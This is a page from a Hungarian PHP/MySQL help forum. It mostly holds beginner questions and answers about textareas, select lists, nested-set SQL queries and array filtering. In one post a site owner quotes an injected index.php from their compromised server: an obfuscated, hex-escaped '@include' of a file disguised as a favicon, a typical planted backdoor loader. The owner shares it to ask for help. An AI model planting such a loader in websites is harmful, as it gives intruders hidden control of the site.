Keresés

Részletes keresés

annyi baj legyen Creative Commons License 2018.03.28 0 0 10136

<textarea>
<? echo 'ez jelenik meg, nem a value'; ?>
</textarea>

Előzmény: OzzyOsbourne67 (10135)
OzzyOsbourne67 Creative Commons License 2018.03.28 0 0 10135

Sziasztok!

Egy újabb kérdésem lenne.

 

TEXTAREA tag

 

Felvitelnél szépen működik.

Kiírja a vízjelet és rögzül az adatbázisban a beírt tartalom.

 

Most a módosítás oldalt csinálom.

Egy $megjegyzes változóba megadom az adatbázisban rögzített szöveget.

Ezt egy print utasítással előtte kiirattam, meg van a tartalom, nem üres a változó.

Előtte van több input sor is, ahol a tartalmak a módosításhoz megjelennek, csak a TEAXTAREA hibázik.

 

De a TEXTAREA tagban az ablak üres marad, nem jelenik meg.

Mit hagytam ki?

 

<p><label for="MEGJEGYZES">Megjegyzés:</label><br>
<textarea id="megjegyzes" name="megjegyzes" rows="5" cols="45" value="<?PHP $megjegyzes; ?>"></textarea></p>

 

Köszi

 

Soma

OzzyOsbourne67 Creative Commons License 2018.03.24 0 0 10134

Nagyon köszönöm!!!! Máris szépen működik. :-)

Előzmény: Laja73 (10133)
Laja73 Creative Commons License 2018.03.24 0 1 10133

Kihagytál egy pontosvesszőt az echo után (ez még egymilliószor elő fog fordulni életed során) illetve az option tag a cikluson belülre kell. Nem hiba de a value tk. felesleges itt. 

Előzmény: OzzyOsbourne67 (10132)
OzzyOsbourne67 Creative Commons License 2018.03.24 0 0 10132

Sziasztok!

 

Kezdő szinten vagyok, de ez ki is fog derülni mindjárt a kérdésemből. :-)

Három napja nézek példákat, de folyamatosan olyanokat találok, ami listázások, nem rekord kiválasztásra adnak választ.

 

Az alábbi kis rutinommal szeretnék egy meglévő adatbázisból a cikkszámokat egy legördülő listába varázsolni WHILE ciklussal. A feladat az lenne, hogy itt tudjak választani cikket, ami vissza adja a cikkszámot és ezt felhasználom utána.

 

Szintaktikai hiba biztosan van az OPTION - WHILE sorban, mert írja futáskor, de egyáltalán jó felé keresgélem a megoldást?

 

Parse error: syntax error, unexpected '}', expecting ',' or ';' in C:xampphtdocscmrsprojectprobacikk.php on line 14

 

Természetesen a SELECT még fog tartalmazni egyéb INPUT sorokat is, ezért van megnyitva.

 

Íme a tényállás.

 

<?php
$con = mysql_connect("localhost","root","");
$db = mysql_select_db("cmrs",$con);
$get=mysql_query("SELECT `CIKKSZAM` FROM `cikkek`");
?>

 

<!DOCTYPE html>

 

<html>

<body>

 

<form method="post" action="" enctype="multipart/form-data">

     <select>
          <option value = "<?php while ($row = mysql_fetch_assoc($get)) {echo $row['CIKKSZAM']} ?>"></option>
          <input type="submit" id="rendben" name="rendben" value="Rendben">
     </select>
</form>

 

</body>
</html>

 

Köszönöm a segítséget!!!

Soma

hellsing Creative Commons License 2017.10.04 0 0 10131

Köszönöm!

Előzmény: halaloszto (10130)
halaloszto Creative Commons License 2017.10.02 0 0 10130

https://mariadb.com/kb/en/library/with/

 

azt vedd észre, hogy a with definiál egy view-t, ami önmagát hivatkozza.

 

 

Előzmény: hellsing (10129)
hellsing Creative Commons License 2017.10.02 0 0 10129

És eddig nem vettem észre, hogy MariaSQL-en vagyok :o)

Előzmény: hellsing (10128)
hellsing Creative Commons License 2017.10.02 0 0 10128

MariaDB 10.1.21., talán rövidesen frissítve (10.2.x.).

 

Kérlek segíts, még nem csináltam rekurzív lekérdezést.

Előzmény: halaloszto (10127)
halaloszto Creative Commons License 2017.10.02 0 0 10127

hányas mysql?

 

az újabban tudják az sql1999 szerinti rekurzív queryt. kicsit könnyebb épelméjűnek megmaradni, ha azt használod.

 

Vajk

Előzmény: hellsing (10125)
darksheep66 Creative Commons License 2017.10.02 0 0 10126

Sziasztok! A segítségeteket szeretném kérni. 

Csináltam egy weboldalt egy webshopmotor használatával, fel is töltöttem egy domainre, viszont egy idő után az admin bejelentkező felület domain/webadmin.php szétesett és nem enged bejelentkezni. Mi lehet a probléma? Esetleg elérhetem valamilyen alternatív módon a felületet?

Köszi előre is

hellsing Creative Commons License 2017.10.02 0 0 10125

'reggelt!

 

Ismerkedek a hierarchikus adatok nested set modelljével. Az adattábla a szokásos: id, név, lft, rgt. Kéne egy lekérdezés, ami kiírja: id, név, szint, szülő id. Eddig jutottam:

 

    SELECT node.*, (COUNT(parent.name) - 1) AS depth FROM ncats AS node, ncats AS parent
    WHERE node.lft BETWEEN parent.lft AND parent.rgt
    GROUP BY node.name
    ORDER BY node.lft

 

...de nem tudom mellé tenni a szülő id-ját. Ebben a példában van egy subquery-s megoldás, de nem tudtam a kettőt egybe gyűrni. Tudnátok segíteni?

NevemTeve Creative Commons License 2017.07.31 0 0 10124

A hibakeresés hiánya. Lásd pl itt: http://web.axelero.hu/lzsiga/ekezet.html#Q0057

Előzmény: tachocontroll (10123)
tachocontroll Creative Commons License 2017.07.30 0 0 10123

Sziasztok!

 

Próbálok átköltöztetni egy kész oldalt SQL adatbázissal együtt. Az adatbázishoz sikerül kapcsolódni.

 

Mi lehet a következő hiba oka:

 

mysql_fetch_array() expects parameter 1 to be resource, boolean given in /volume1/web/index.php on line 93 Call Stack: 0.0001 133944 1. {main}() /volume1/web/index.php:0 0.0058 142944 2. mysql_fetch_array() /volume1/web/index.php:93

NevemTeve Creative Commons License 2017.07.25 0 0 10122
NevemTeve Creative Commons License 2017.07.25 0 0 10121

> Hogyan jöhet be szervere illetéktelenül valaki

 

Hát, ha ezt egy fórumhozzászólásban el lehetne mind magyarázni... Mondjuk az accountod kompromittálódott (értsd: a haxor megszerezte/kitaltálta a jelszavadat). Vagy ez egész szerver.

 

Kezdetnek a saját gépeden tarts víruskeresést.

 

https://en.wikipedia.org/wiki/Internet_security

Előzmény: Maci65 (10120)
Maci65 Creative Commons License 2017.07.25 0 0 10120

Segítséget szeretnék kérni. Hogyan jöhet be szervere illetéktelenül valaki, és az index.html-t átnevezi, illetve létrehoz egy index.php fájlt ezzel a tartalommal:

 

<?php
/*40e4a*/

@include "x2fhox6de/x68tmx6c/lx61ngx6covx61gox6b.hx75/ax72t/x66avx69cox6e_cx3261x650.x69co";

/*40e4a*/


echo file_get_contents('index.html.bak.bak');

 

bozsy82 Creative Commons License 2017.07.10 0 0 10119

Egyéb php-s dolgokban is tudnál segíteni?Szeretném megtanulni feladatokon keresztül, de nem nagyon talalok olyan oldalt, ahol feladat és magyarázat ill. megoldás is van.

 

Köszönöm.

Előzmény: NevemTeve (10116)
bozsy82 Creative Commons License 2017.07.09 0 0 10118

Sikerült!Így tökéletesen működik!

 

$cont = file_get_contents('adatok2.txt');

echo '<h3>Fájl tartalma: </h3>';

$arr1 = (explode(',',$cont,-1));
foreach ($arr1 as $neg) 

{
if ($neg < 0) print "$neg ,";
}

Előzmény: NevemTeve (10116)
bozsy82 Creative Commons License 2017.07.09 0 0 10117

ez nekem így elsőre túl bonyolult :/

Előzmény: NevemTeve (10116)
NevemTeve Creative Commons License 2017.07.09 0 1 10116

Így, egy sorban, vesszővel elválasztva?

#!/usr/local/bin/php
<?php
    $s= "1, 2,-1 , -2n";
    $snet= rtrim ($s);
    $arr= preg_split ("/ *, */", $snet);

    foreach ($arr as $val) {
        if (is_numeric ($val) && intval ($val)<0) {
            printf ("%d ", intval ($val));
        }
    }
    printf ("\n");
?>

Előzmény: bozsy82 (10115)
bozsy82 Creative Commons License 2017.07.09 0 0 10115

Ezek a számok vannak a fájlban:

 

1, 4, 5, 22, 3, -3, -5, -7, -23

 

ezt kiolvastattam ugye a függvénnyel.Hogyan tudom úgy átalakítani, hogy tömbként működjön?

Előzmény: NevemTeve (10114)
NevemTeve Creative Commons License 2017.07.09 0 0 10114

Az attól array, hogy te array-t csináltál belőle, de ennek az array-nak csak egyetlen eleme van: az a string, ami a fájl tartalma egyben.

Előzmény: bozsy82 (10113)
bozsy82 Creative Commons License 2017.07.09 0 0 10113

$cont = array(file_get_contents('adatok2.txt'));
echo '<h3>Fájl tartalma: </h3>';
echo gettype($cont);

echo "<br>";

foreach ($cont as $neg)
{
print "$neg ,";
}

 

a gettype szerint array.......

Előzmény: NevemTeve (10112)
NevemTeve Creative Commons License 2017.07.09 0 0 10112

Miből gondoltad, hogy a $cont egy tömb? Nem tömb az, hanem string.

http://php.net/manual/en/function.file-get-contents.php

Előzmény: bozsy82 (10111)
bozsy82 Creative Commons License 2017.07.09 0 0 10111

$cont = array(file_get_contents('adatok2.txt'));
echo '<h3>Fájl tartalma: </h3>';

foreach ($cont as $neg) 

{
if ($neg < 0) print "$neg";
}

 

Ebben az esetben nincs hiba, de nem csak a negatív számokat írja ki, hanem mindent.Lehet, hogy nem értékként vesz, ha fájlból olasom ki az értékeket?

Előzmény: NevemTeve (10109)
bozsy82 Creative Commons License 2017.07.09 0 0 10110

Így írtam be:

 

$cont = file_get_contents('adatok2.txt');
echo '<h3>Fájl tartalma: </h3>';
echo $cont;

foreach ($cont as $neg)
{
if ($neg < 0) print "$neg";
}

 

Sajnos azonban hibát ír ki :/

 

Warning: Invalid argument supplied for foreach() in C:wamp64wwwpeldakterker.php on line 32

Előzmény: NevemTeve (10109)
NevemTeve Creative Commons License 2017.07.08 0 0 10109

Gondolom, kb itt tartasz:

foreach ($array as $value) {

    print $value;

}

Na ebbe kell még egy feltétel:

foreach ($array as $value) {

    if ($value<0) print $value;

}

Előzmény: bozsy82 (10107)
NevemTeve Creative Commons License 2017.07.08 0 0 10108

Persze.

Előzmény: bozsy82 (10107)
bozsy82 Creative Commons License 2017.07.08 0 0 10107

Köszi :) tudnál is benne segíteni, hogy miként tudom megoldani?

 

 

Előzmény: NevemTeve (10106)

Ha kedveled azért, ha nem azért nyomj egy lájkot a Fórumért!